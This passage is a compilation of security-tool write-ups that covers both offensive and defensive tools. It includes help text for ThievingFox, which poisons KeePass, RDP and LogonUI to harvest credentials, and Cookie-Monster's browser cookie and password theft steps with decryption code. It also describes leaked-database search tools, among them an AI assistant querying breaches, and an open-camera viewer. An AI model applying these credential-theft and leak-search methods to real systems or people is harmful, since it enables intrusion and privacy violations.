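print("HKCR:", inprocserver32(winreg.HKEY_CLASSES_ROOT,
                              rf"CLSID\{CLSID}\InProcServer32"))
```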

--keepass and --keepassxc have specific options, --keepass-path, --keepass-share, and --keepassxc-path, --keepassxc-share, to specify where these applications are installed, if it's not the default installation path. This is not required for other applications, since COM hijacking is used.

The KeePass module requires the Visual C++ Redistributable to be installed on the target.

Multiple applications can be specified at once, or, the --all flag can be used to target all applications.

[!IMPORTANT] Remember to clean the cache if you ever change the --tempdir parameter, since the directory name is embedded inside native DLLs.

$ python3 client/ThievingFox.py poison -h
usage: ThievingFox.py poison [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-path KEEPASS_PATH]
[--keepass-share KEEPASS_SHARE] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--mstsc-poison-hkcr]
[--consent] [--logonui] [--rdcman] [--rdcman-poison-hkcr] [--mobaxterm] [--mobaxterm-poison-hkcr] [--all]
target

positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

options:
-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of the domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Try to poison KeePass.exe
--keepass-path KEEPASS_PATH
The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
--keepass-share KEEPASS_SHARE
The share on which KeePass is installed (Default: c$)
--keepassxc Try to poison KeePassXC.exe
--keepassxc-path KEEPASSXC_PATH
The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
--keepassxc-share KEEPASSXC_SHARE
The share on which KeePassXC is installed (Default: c$)
--mstsc Try to poison mstsc.exe
--mstsc-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for mstsc, which will also work for user that are currently not
logged in (Default: False)
--consent Try to poison Consent.exe
--logonui Try to poison LogonUI.exe
--rdcman Try to poison RDCMan.exe
--rdcman-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for RDCMan, which will also work for user that are currently not
logged in (Default: False)
--mobaxterm Try to poison MobaXTerm.exe
--mobaxterm-poison-hkcr
Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for MobaXTerm, which will also work for user that are currently not
logged in (Default: False)
--all Try to poison all applications

Cleanup

For each application specified in the command line parameters, the cleanup module first removes the poisoning artifacts that force the target application to load the hooking library. Then, it tries to delete the libraries that were uploaded to the remote host.

For applications that support poisoning of both the HKCU and HKCR hives, both are cleaned up regardless.

Multiple applications can be specified at once, or, the --all flag can be used to cleanup all applications.

It does not clean extracted credentials on the remote host.

[!IMPORTANT] If the targeted application is in use while the cleanup module is run, the DLLs that were dropped on the target cannot be deleted. Nonetheless, the cleanup module will revert the configuration that enables the injection, which should ensure that the next time the application is launched, no injection is performed. Files that cannot be deleted by ThievingFox are logged.

$ python3 client/ThievingFox.py cleanup -h
usage: ThievingFox.py cleanup [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-share KEEPASS_SHARE]
[--keepass-path KEEPASS_PATH] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--consent] [--logonui]
[--rdcman] [--mobaxterm] [--all]
target

positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

options:
-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of the domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Try to cleanup all poisonning artifacts related to KeePass.exe
--keepass-share KEEPASS_SHARE
The share on which KeePass is installed (Default: c$)
--keepass-path KEEPASS_PATH
The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
--keepassxc Try to cleanup all poisonning artifacts related to KeePassXC.exe
--keepassxc-path KEEPASSXC_PATH
The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
--keepassxc-share KEEPASSXC_SHARE
The share on which KeePassXC is installed (Default: c$)
--mstsc Try to cleanup all poisonning artifacts related to mstsc.exe
--consent Try to cleanup all poisonning artifacts related to Consent.exe
--logonui Try to cleanup all poisonning artifacts related to LogonUI.exe
--rdcman Try to cleanup all poisonning artifacts related to RDCMan.exe
--mobaxterm Try to cleanup all poisonning artifacts related to MobaXTerm.exe
--all Try to cleanup all poisonning artifacts related to all applications

Collect

For each application specified on the command line parameters, the collect module retrieves output files stored on the remote host inside C:\Windows\Temp\<tempdir> corresponding to the application, and decrypts them. The files are deleted from the remote host, and the retrieved data is stored in client/output/.

Multiple applications can be specified at once, or, the --all flag can be used to collect logs from all applications.

$ python3 client/ThievingFox.py collect -h
usage: ThievingFox.py collect [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepassxc] [--mstsc] [--consent]
[--logonui] [--rdcman] [--mobaxterm] [--all]
target

positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]

options:
-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of the domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Collect KeePass.exe logs
--keepassxc Collect KeePassXC.exe logs
--mstsc Collect mstsc.exe logs
--consent Collect Consent.exe logs
--logonui Collect LogonUI.exe logs
--rdcman Collect RDCMan.exe logs
--mobaxterm Collect MobaXTerm.exe logs
--all Collect logs from all applications


HackerInfo - Information Gathering For Web Application Security

By: Zion3R




Information gathering for web application security


Install:

sudo apt install python3 python3-pip

pip3 install termcolor

pip3 install google

pip3 install optioncomplete

pip3 install bs4


pip3 install prettytable

git clone https://github.com/Matrix07ksa/HackerInfo/

cd HackerInfo

chmod +x HackerInfo

./HackerInfo -h



python3 HackerInfo.py -d www.facebook.com -f pdf
[+] <-- Running Domain_filter_File ....-->
[+] <-- Searching [www.facebook.com] Files [pdf] ....-->
https://www.facebook.com/gms_hub/share/dcvsda_wf.pdf
https://www.facebook.com/gms_hub/share/facebook_groups_for_pages.pdf
https://www.facebook.com/gms_hub/share/videorequirementschart.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_hi_in.pdf
https://www.facebook.com/gms_hub/share/bidding-strategy_decision-tree_en_us.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_es_la.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_ar.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_ur_pk.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_cs_cz.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_it_it.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_pl_pl.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_nl.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_pt_br.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_id_id.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_fr_fr.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_tr_tr.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_hi_in.pdf
https://www.facebook.com/rsrc.php/yA/r/AVye1Rrg376.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_ur_pk.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_nl_nl.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_de_de.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_de_de.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_cs_cz.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_sk_sk.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_japanese_jp.pdf
#####################[Finished]########################
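
The PDF list above is the result of a Google dork of the form site:<domain> filetype:pdf. With the google package installed earlier, the same kind of query can be reproduced in a few lines (an illustrative sketch, not HackerInfo's internals; result limits and rate-limit pauses depend on the installed package version):

```python
from googlesearch import search  # module provided by `pip3 install google`

# Dork for publicly indexed PDFs on the target domain, keeping the first 20 hits.
for i, url in enumerate(search("site:www.facebook.com filetype:pdf")):
    if i >= 20:
        break
    print(url)
```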

Usage:

HackerInfo - information gathering for web application security (11)

Install the hackinfo library:

sudo python setup.py install
pip3 install hackinfo



Cookie-Monster - BOF To Steal Browser Cookies & Credentials

By: Zion3R


Steal browser cookies for Edge, Chrome, and Firefox through a BOF or exe! Cookie-Monster will extract the WebKit master key, locate a browser process with a handle to the Cookies and Login Data files, copy the handle(s), and then filelessly download the target files. Once the Cookies/Login Data file(s) are downloaded, the Python decryption script can help extract those secrets! The Firefox module will parse profiles.ini, locate the logins.json and key4.db files, and download them. A separate GitHub repo is referenced for offline decryption.
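
For reference, the decryption that the helper script performs on modern Chrome/Edge values is AES-256-GCM with the DPAPI-unwrapped master key, roughly as sketched below (assumes pycryptodome; the key bytes and blob are placeholders, and this is not the repo's decrypt.py verbatim):

```python
from Crypto.Cipher import AES  # pip3 install pycryptodome

def decrypt_chromium_value(master_key: bytes, blob: bytes) -> str:
    """Decrypt a 'v10'/'v11'-prefixed encrypted_value from the Cookies/Login Data SQLite DB."""
    assert blob[:3] in (b"v10", b"v11")
    nonce, ciphertext, tag = blob[3:15], blob[15:-16], blob[-16:]
    cipher = AES.new(master_key, AES.MODE_GCM, nonce=nonce)
    return cipher.decrypt_and_verify(ciphertext, tag).decode()

# master_key: the 32-byte WebKit key extracted by the BOF (base64-encoded in the steps below).
# blob: the raw encrypted_value bytes read from the downloaded Cookies file.
```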


BOF Usage

Usage: cookie-monster [ --chrome || --edge || --firefox || --chromeCookiePID <pid> || --chromeLoginDataPID <PID> || --edgeCookiePID <pid> || --edgeLoginDataPID <pid>] 
cookie-monster Example:
cookie-monster --chrome
cookie-monster --edge
cookie-monster --firefox
cookie-monster --chromeCookiePID 1337
cookie-monster --chromeLoginDataPID 1337
cookie-monster --edgeCookiePID 4444
cookie-monster --edgeLoginDataPID 4444
cookie-monster Options:
--chrome, looks at all running processes and handles, if one matches chrome.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
--edge, looks at all running processes and handles, if one matches msedge.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
--firefox, looks for profiles.ini and locates the key4.db and logins.json file
--chromeCookiePID, if a chrome process with a handle to Cookies is known, specify the PID to duplicate its handle and file
--chromeLoginDataPID, if a chrome process with a handle to Login Data is known, specify the PID to duplicate its handle and file
--edgeCookiePID, if an edge process with a handle to Cookies is known, specify the PID to duplicate its handle and file
--edgeLoginDataPID, if an edge process with a handle to Login Data is known, specify the PID to duplicate its handle and file

EXE usage

Cookie Monster Example:
cookie-monster.exe --all
Cookie Monster Options:
-h, --help Show this help message and exit
--all Run chrome, edge, and firefox methods
--edge Extract edge keys and download Cookies/Login Data file to PWD
--chrome Extract chrome keys and download Cookies/Login Data file to PWD
--firefox Locate firefox key and Cookies, does not make a copy of either file

Decryption Steps

Install requirements

pip3 install -r requirements.txt

Base64 encode the webkit masterkey

python3 base64-encode.py "\xec\xfc...."

Decrypt Chrome/Edge Cookies File

python .\decrypt.py "XHh..." --cookies ChromeCookie.db

Results Example:
-----------------------------------
Host: .github.com
Path: /
Name: dotcom_user
Cookie: KingOfTheNOPs
Expires: Oct 28 2024 21:25:22

Host: github.com
Path: /
Name: user_session
Cookie: x123.....
Expires: Nov 11 2023 21:25:22

Decrypt Chrome/Edge Passwords File

python .\decrypt.py "XHh..." --passwords ChromePasswords.db

Results Example:
-----------------------------------
URL: https://test.com/
Username: tester
Password: McTesty

Decrypt Firefox Cookies and Stored Credentials:
https://github.com/lclevy/firepwd

Installation

Ensure Mingw-w64 and make are installed on Linux prior to compiling.

make

To compile the exe on Windows:

gcc .\cookie-monster.c -o cookie-monster.exe -lshlwapi -lcrypt32

TO-DO

  • update decrypt.py to support firefox based on firepwd and add bruteforce module based on DonPAPI

References

This project could not have been done without the help of Mr-Un1k0d3r and his amazing seasonal videos! Highly recommend checking out his lessons!!!
Cookie Webkit Master Key Extractor: https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF
Fileless download: https://github.com/fortra/nanodump
Decrypt Cookies and Login Data: https://github.com/login-securite/DonPAPI



CloudGrappler - A purpose-built tool designed for effortless querying of high-fidelity and single-event detections related to well-known threat actors in popular cloud environments such as AWS and Azure

By: Zion3R


Permiso: https://permiso.io
Read our release blog: https://permiso.io/blog/cloudgrappler-a-powerful-open-source-threat-detection-tool-for-cloud-environments

CloudGrappler is a purpose-built tool designed for effortless querying of high-fidelity and single-event detections related to well-known threat actors in popular cloud environments such as AWS and Azure.


Notes

To optimize your utilization of CloudGrappler, we recommend using shorter time ranges when querying for results. This approach enhances efficiency and accelerates the retrieval of information, ensuring a more seamless experience with the tool.

Required Packages

```bash
pip3 install -r requirements.txt
```

Cloning cloudgrep locally

To clone the cloudgrep repository locally, run the clone.sh file. Alternatively, you can manually clone the repository into the same directory where CloudGrappler was cloned.

```bash
chmod +x clone.sh
./clone.sh
```

Input

This tool offers a CLI (Command Line Interface). As such, here we review its use:

Example 1 - Running the tool with default queries file

Define the scanning scope inside data_sources.json file based on your cloud infrastructure configuration. The following example showcases a structured data_sources.json file for both AWS and Azure environments:

Note

Modifying the source inside the queries.json file to a wildcard character (*) will scan the corresponding query across both AWS and Azure environments.

{
  "AWS": [
    {
      "bucket": "cloudtrail-logs-00000000-ffffff",
      "prefix": [
        "testTrails/AWSLogs/00000000/CloudTrail/eu-east-1/2024/03/03",
        "testTrails/AWSLogs/00000000/CloudTrail/us-west-1/2024/03/04"
      ]
    },
    {
      "bucket": "aws-kosova-us-east-1-00000000"
    }
  ],
  "AZURE": [
    {
      "accountname": "logs",
      "container": [
        "cloudgrappler"
      ]
    }
  ]
}

Run command

python3 main.py

Example 2 - Permiso Intel Use Case

python3 main.py -p

[+] Running GetFileDownloadUrls.*secrets_ for AWS 
[+] Threat Actor: LUCR3
[+] Severity: MEDIUM
[+] Description: Review use of CloudShell. Permiso seldom witnesses use of CloudShell outside of known attackers. This however may be a part of your normal business use case.

Example 3 - Generate report

python3 main.py -p -jo

reports
└── json
    ├── AWS
    │   └── 2024-03-04 01:01 AM
    │       └── cloudtrail-logs-00000000-ffffff--
    │           └── testTrails/AWSLogs/00000000/CloudTrail/eu-east-1/2024/03/03
    │               └── GetFileDownloadUrls.*secrets_.json
    └── AZURE
        └── 2024-03-04 01:01 AM
            └── logs
                └── cloudgrappler
                    └── okta_key.json

Example 4 - Filtering logs based on date or time

python3 main.py -p -sd 2024-02-15 -ed 2024-02-16

Example 5 - Manually adding queries and data source types

python3 main.py -q "GetFileDownloadUrls.*secret", "UpdateAccessKey" -s '*'

Example 6 - Running the tool with your own queries file

python3 main.py -f new_file.json

Running in your Cloud and Authentication cloudgrep

AWS

Your system will need access to the S3 bucket. For example, if you are running on your laptop, you will need to configure the AWS CLI. If you are running on an EC2, an Instance Profile is likely the best choice.

If you run on an EC2 instance in the same region as the S3 bucket with a VPC endpoint for S3 you can avoid egress charges. You can authenticate in a number of ways.

Azure

The simplest way to authenticate with Azure is to first run:

az login

This will open a browser window and prompt you to login to Azure.



ST Smart Things Sentinel - Advanced Security Tool To Detect Threats Within The Intricate Protocols utilized By IoT Devices

By: Zion3R


ST Smart Things Sentinel is an advanced security tool engineered specifically to scrutinize and detect threats within the intricate protocols utilized by IoT (Internet of Things) devices. In the ever-expanding landscape of connected devices, ST Smart Things Sentinel emerges as a vigilant guardian, specializing in protocol-level threat detection. This tool empowers users to proactively identify and neutralize potential security risks, ensuring the integrity and security of IoT ecosystems.


~ Hilali Abdel

USAGE

python st_tool.py [-h] [-s] [--add ADD] [--scan SCAN] [--id ID] [--search SEARCH] [--bug BUG] [--firmware FIRMWARE] [--type TYPE] [--detect] [--tty] [--uart UART] [--fz FZ]

[Add new Device]

python3 smartthings.py -a 192.168.1.1

python3 smartthings.py -s --type TPLINK

python3 smartthings.py -s --firmware TP-Link Archer C7v2

Search for CVEs and PoCs [firmware and device type]


Scan a device for open UPnP ports

python3 smartthings.py -s --scan upnp --id

Get data from MQTT 'subscribe'

python3 smartthings.py -s --scan mqtt --id
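
The MQTT 'subscribe' check amounts to connecting to the device's broker and listening on a wildcard topic, which looks roughly like this with paho-mqtt (an illustrative sketch assuming the paho-mqtt 1.x client API, not the tool's code; the broker address is a placeholder):

```python
import paho.mqtt.client as mqtt  # pip3 install paho-mqtt

def on_message(client, userdata, msg):
    # Print every topic/payload the broker lets an unauthenticated client see.
    print(msg.topic, msg.payload)

client = mqtt.Client()
client.on_message = on_message
client.connect("192.168.1.1", 1883, keepalive=60)  # placeholder device/broker address
client.subscribe("#")  # wildcard: all topics
client.loop_forever()
```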



DroidLysis - Property Extractor For Android Apps

By: Zion3R


DroidLysis is a pre-analysis tool for Android apps: it performs repetitive and boring tasks we'd typically do at the beginning of any reverse engineering. It disassembles the Android sample, organizes output in directories, and searches for suspicious spots in the code to look at. The output helps the reverse engineer speed up the first few steps of analysis.

DroidLysis can be used over Android packages (apk), Dalvik executables (dex), Zip files (zip), Rar files (rar) or directories of files.


Installing DroidLysis

  1. Install required system packages:

sudo apt-get install default-jre git python3 python3-pip unzip wget libmagic-dev libxml2-dev libxslt-dev

  2. Install Android disassembly tools:

  • Apktool,
  • Baksmali, and optionally
  • Dex2jar and
  • Obsolete: Procyon (note that Procyon only works with Java 8, not Java 11).

$ mkdir -p ~/softs
$ cd ~/softs
$ wget https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.9.3.jar
$ wget https://bitbucket.org/JesusFreke/smali/downloads/baksmali-2.5.2.jar
$ wget https://github.com/pxb1988/dex2jar/releases/download/v2.4/dex-tools-v2.4.zip
$ unzip dex-tools-v2.4.zip
$ rm -f dex-tools-v2.4.zip

  3. Get DroidLysis from the Git repository (preferred) or from pip

Install from Git in a Python virtual environment (python3 -m venv, or pyenv virtual environments etc).

$ python3 -m venv venv
$ source ./venv/bin/activate
(venv) $ pip3 install git+https://github.com/cryptax/droidlysis

Alternatively, you can install DroidLysis directly from PyPi (pip3 install droidlysis).

  4. Configure conf/general.conf. In particular, make sure to replace /home/axelle with your appropriate directories.
[tools]
apktool = /home/axelle/softs/apktool_2.9.3.jar
baksmali = /home/axelle/softs/baksmali-2.5.2.jar
dex2jar = /home/axelle/softs/dex-tools-v2.4/d2j-dex2jar.sh
procyon = /home/axelle/softs/procyon-decompiler-0.5.30.jar
keytool = /usr/bin/keytool
...
  5. Run it:
python3 ./droidlysis3.py --help

Configuration

The configuration file is ./conf/general.conf (you can switch to another file with the --config option). This is where you configure the location of various external tools (e.g. Apktool), the name of pattern files (by default ./conf/smali.conf, ./conf/wide.conf, ./conf/arm.conf, ./conf/kit.conf) and the name of the database file (only used if you specify --enable-sql)

Be sure to specify the correct paths for disassembly tools, or DroidLysis won't find them.

Usage

DroidLysis uses Python 3. To launch it and get options:

droidlysis --help

For example, test it on Signal's APK:

droidlysis --input Signal-website-universal-release-6.26.3.apk --output /tmp --config /PATH/TO/DROIDLYSIS/conf/general.conf

DroidLysis outputs:

  • A summary on the console (see image above)
  • The unzipped, pre-processed sample in a subdirectory of your output dir. The subdirectory is named using the sample's filename and sha256 sum. For example, if we analyze the Signal application and set --output /tmp, the analysis will be written to /tmp/Signalwebsiteuniversalrelease4.52.4.apk-f3c7d5e38df23925dd0b2fe1f44bfa12bac935a6bc8fe3a485a4436d4487a290.
  • A database (by default, SQLite droidlysis.db) containing properties it noticed.

Options

Get usage with droidlysis --help

  • The input can be a file or a directory of files to recursively look into. DroidLysis knows how to process Android packages, DEX, ODEX and ARM executables, ZIP, RAR. DroidLysis won't fail on other types of files (unless there is a bug...) but won't be able to understand the content.

  • When processing directories of files, it is typically quite helpful to move processed samples to another location to know what has been processed. This is handled by option --movein. Also, if you are only interested in statistics, you should probably clear the output directory which contains detailed information for each sample: this is option --clearoutput. If you want to store all statistics in a SQL database, use --enable-sql (see here)

  • DEX decompilation is quite long with Procyon, so this option is disabled by default. If you want to decompile to Java, use --enable-procyon.

  • DroidLysis's analysis does not inspect known third-party SDKs by default, i.e. it won't report any suspicious activity from them. If you want them to be inspected, use option --no-kit-exception. This usually creates many more detected properties for the sample, as SDKs (e.g. advertisement) use lots of flagged APIs (get GPS location, get IMEI, get IMSI, HTTP POST...).

Sample output directory (--output DIR)

This directory contains (when applicable):

  • A readable AndroidManifest.xml
  • Readable resources in res
  • Libraries lib, assets assets
  • Disassembled Smali code: smali (and others)
  • Package meta information: META-INF
  • Package contents when simply unzipped in ./unzipped
  • DEX executable classes.dex (and others), and converted to jar: classes-dex2jar.jar, and unjarred in ./unjarred

The following files are generated by DroidLysis:

  • autoanalysis.md: lists each pattern DroidLysis detected and where.
  • report.md: same as what was printed on the console

If you do not need the sample output directory to be generated, use the option --clearoutput.

Import trackers from Exodus etc (--import-exodus)

$ python3 ./droidlysis3.py --import-exodus --verbose
Processing file: ./droidurl.pyc ...
DEBUG:droidconfig.py:Reading configuration file: './conf/./smali.conf'
DEBUG:droidconfig.py:Reading configuration file: './conf/./wide.conf'
DEBUG:droidconfig.py:Reading configuration file: './conf/./arm.conf'
DEBUG:droidconfig.py:Reading configuration file: '/home/axelle/.cache/droidlysis/./kit.conf'
DEBUG:droidproperties.py:Importing ETIP Exodus trackers from https://etip.exodus-privacy.eu.org/api/trackers/?format=json
DEBUG:connectionpool.py:Starting new HTTPS connection (1): etip.exodus-privacy.eu.org:443
DEBUG:connectionpool.py:https://etip.exodus-privacy.eu.org:443 "GET /api/trackers/?format=json HTTP/1.1" 200 None
DEBUG:droidproperties.py:Appending imported trackers to /home/axelle/.cache/droidlysis/./kit.conf

Trackers from Exodus which are not present in your initial kit.conf are appended to ~/.cache/droidlysis/kit.conf. Diff the 2 files and check what trackers you wish to add.

SQLite database

If you want to process a directory of samples, you'll probably want to store the properties DroidLysis found in a database, to easily parse and query the findings. In that case, use the option --enable-sql. This will automatically dump all results in a database named droidlysis.db, in a table named samples. Each entry in the table corresponds to a given sample, and each column is a property DroidLysis tracks.

For example, to retrieve all filename, SHA256 sum and smali properties of the database:

sqlite> select sha256, sanitized_basename, smali_properties from samples;
f3c7d5e38df23925dd0b2fe1f44bfa12bac935a6bc8fe3a485a4436d4487a290|Signalwebsiteuniversalrelease4.52.4.apk|{"send_sms": true, "receive_sms": true, "abort_broadcast": true, "call": false, "email": false, "answer_call": false, "end_call": true, "phone_number": false, "intent_chooser": true, "get_accounts": true, "contacts": false, "get_imei": true, "get_external_storage_stage": false, "get_imsi": false, "get_network_operator": false, "get_active_network_info": false, "get_line_number": true, "get_sim_country_iso": true,
...
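The same data can be queried programmatically. Below is a minimal Python sketch, assuming the default droidlysis.db database and the samples table/columns shown above:

import sqlite3

# Query the database produced by --enable-sql (default name: droidlysis.db)
conn = sqlite3.connect('droidlysis.db')
query = 'select sha256, sanitized_basename, smali_properties from samples'
for sha256, name, smali_properties in conn.execute(query):
    print(sha256, name)
    print(smali_properties)
conn.close()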

Property patterns

What DroidLysis detects can be configured and extended in the files of the ./conf directory.

A pattern consists of:

  • a tag name: for example send_sms. This names the property and must be unique across the .conf file.
  • a pattern: this is a regexp to be matched, e.g. ;->sendTextMessage|;->sendMultipartTextMessage|SmsManager;->sendDataMessage. In the smali.conf file, this regexp is matched against the Smali code. In this particular case, there are 3 different ways to send SMS messages from the code: sendTextMessage, sendMultipartTextMessage and sendDataMessage.
  • a description (optional): explains the importance of the property and what it means.
[send_sms]
pattern=;->sendTextMessage|;->sendMultipartTextMessage|SmsManager;->sendDataMessage
description=Sending SMS messages
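
To extend detection, you can append a new section in the same format. For example, a hypothetical pattern (not shipped with DroidLysis) flagging Wi-Fi information access could look like this:

[get_wifi_info]
pattern=WifiManager;->getConnectionInfo|WifiManager;->getScanResults
description=Accessing Wi-Fi connection information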

Importing Exodus Privacy Trackers

Exodus Privacy maintains a list of various SDKs which are interesting to rule out in our analysis via conf/kit.conf. Add option --import-exodus to the droidlysis command line: this will parse the trackers Exodus Privacy knows about which aren't yet in your kit.conf. Finally, it will append all new trackers to ~/.cache/droidlysis/kit.conf.

Afterwards, you may want to sort your kit.conf file:

import configparser
import collections
import os

config = configparser.ConfigParser({}, collections.OrderedDict)
config.read(os.path.expanduser('~/.cache/droidlysis/kit.conf'))
# Order all sections alphabetically
config._sections = collections.OrderedDict(sorted(config._sections.items(), key=lambda t: t[0] ))
with open('sorted.conf','w') as f:
    config.write(f)

Updates

  • v3.4.6 - Detecting manifest feature that automatically loads APK at install
  • v3.4.5 - Creating a writable user kit.conf file
  • v3.4.4 - Bug fix #14
  • v3.4.3 - Using configuration files
  • v3.4.2 - Adding import of Exodus Privacy Trackers
  • v3.4.1 - Removed dependency to Androguard
  • v3.4.0 - Multidex support
  • v3.3.1 - Improving detection of Base64 strings
  • v3.3.0 - Dumping data to JSON
  • v3.2.1 - IP address detection
  • v3.2.0 - Dex2jar is optional
  • v3.1.0 - Detection of Base64 strings


DarkGPT - An OSINT Assistant Based On GPT-4-200K Designed To Perform Queries On Leaked Databases, Thus Providing An Artificial Intelligence Assistant That Can Be Useful In Your Traditional OSINT Processes

By: Zion3R


DarkGPT is an artificial intelligence assistant based on GPT-4-200K designed to perform queries on leaked databases. This guide will help you set up and run the project on your local environment.


Prerequisites

Before starting, make sure you have Python installed on your system. This project has been tested with Python 3.8 and higher versions.

Environment Setup

  1. Clone the Repository

First, you need to clone the GitHub repository to your local machine. You can do this by executing the following command in your terminal:

git clone https://github.com/luijait/DarkGPT.git
cd DarkGPT

  2. Configure Environment Variables

You will need to set up some environment variables for the script to work correctly. Copy the .env.example file to a new file named .env:

DEHASHED_API_KEY="your_dehashed_api_key_here"

  3. Install Dependencies

This project requires certain Python packages to run. Install them by running the following command:

pip install -r requirements.txt

  4. Run the project:

python3 main.py



LeakSearch - Search & Parse Password Leaks

By: Zion3R


LeakSearch is a simple tool to search and parse plain text passwords using ProxyNova COMB (Combination Of Many Breaches) over the Internet. You can define a custom proxy and you can also use your own password file, to search using different keywords: such as user, domain or password.

In addition, you can define how many results you want to display on the terminal and export them as JSON or TXT files. Due to the simplicity of the code, it is very easy to add new sources, so more providers will be added in the future.


Requirements
  • Python 3
  • Install requirements

Download

It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:

git clone https://github.com/JoelGMSec/LeakSearch

Usage
  _               _     ____                      _     
| | ___ __ _| | __/ ___| ___ __ _ _ __ ___| |__
| | / _ \/ _` | |/ /\___ \ / _ \/ _` | '__/ __| '_ \
| |__| __/ (_| | < ___) | __/ (_| | | | (__| | | |
|_____\___|\__,_|_|\_\|____/ \___|\__,_|_| \___|_| |_|

------------------- by @JoelGMSec -------------------

usage: LeakSearch.py [-h] [-d DATABASE] [-k KEYWORD] [-n NUMBER] [-o OUTPUT] [-p PROXY]

options:
-h, --help show this help message and exit
-d DATABASE, --database DATABASE
Database used for the search (ProxyNova or LocalDataBase)
-k KEYWORD, --keyword KEYWORD
Keyword (user/domain/pass) to search for leaks in the DB
-n NUMBER, --number NUMBER
Number of results to show (default is 20)
-o OUTPUT, --output OUTPUT
Save the results as json or txt into a file
-p PROXY, --proxy PROXY
Set HTTP/S proxy (like http://localhost:8080)


The detailed guide of use can be found at the following link:

https://darkbyte.net/buscando-y-filtrando-contrasenas-con-leaksearch


License

This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.


Credits and Acknowledgments

This tool has been created and designed from scratch by Joel Gรกmez Molina (@JoelGMSec).


Contact

This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.

For more information, you can find me on Twitter as @JoelGMSec and on my blog darkbyte.net.



Pantheon - Insecure Camera Parser

By: Zion3R


Pantheon is a GUI application that allows users to display information regarding network cameras in various countries as well as an integrated live-feed for non-protected cameras.

Functionalities

Pantheon allows users to execute an API crawler. There was originally functionality that did not rely on any APIs (like Insecam), but Google's TOS kept getting in the way of the original scraping mechanism.


Installation

  1. git clone https://github.com/josh0xA/Pantheon.git
  2. cd Pantheon
  3. pip3 install -r requirements.txt
    Execution: python3 pantheon.py
  • Note: I will later add a GUI installer to make it fully independent of a CLI

Windows

  • You can just follow the steps above or download the official package here.
  • Note, the PE binary of Pantheon was put together using pyinstaller, so Windows Defender might get a bit upset.

Ubuntu

  • First, complete steps 1, 2 and 3 listed above.
  • chmod +x distros/ubuntu_install.sh
  • ./distros/ubuntu_install.sh

Debian and Kali Linux

  • First, complete steps 1, 2 and 3 listed above.
  • chmod +x distros/debian-kali_install.sh
  • ./distros/debian-kali_install.sh

MacOS

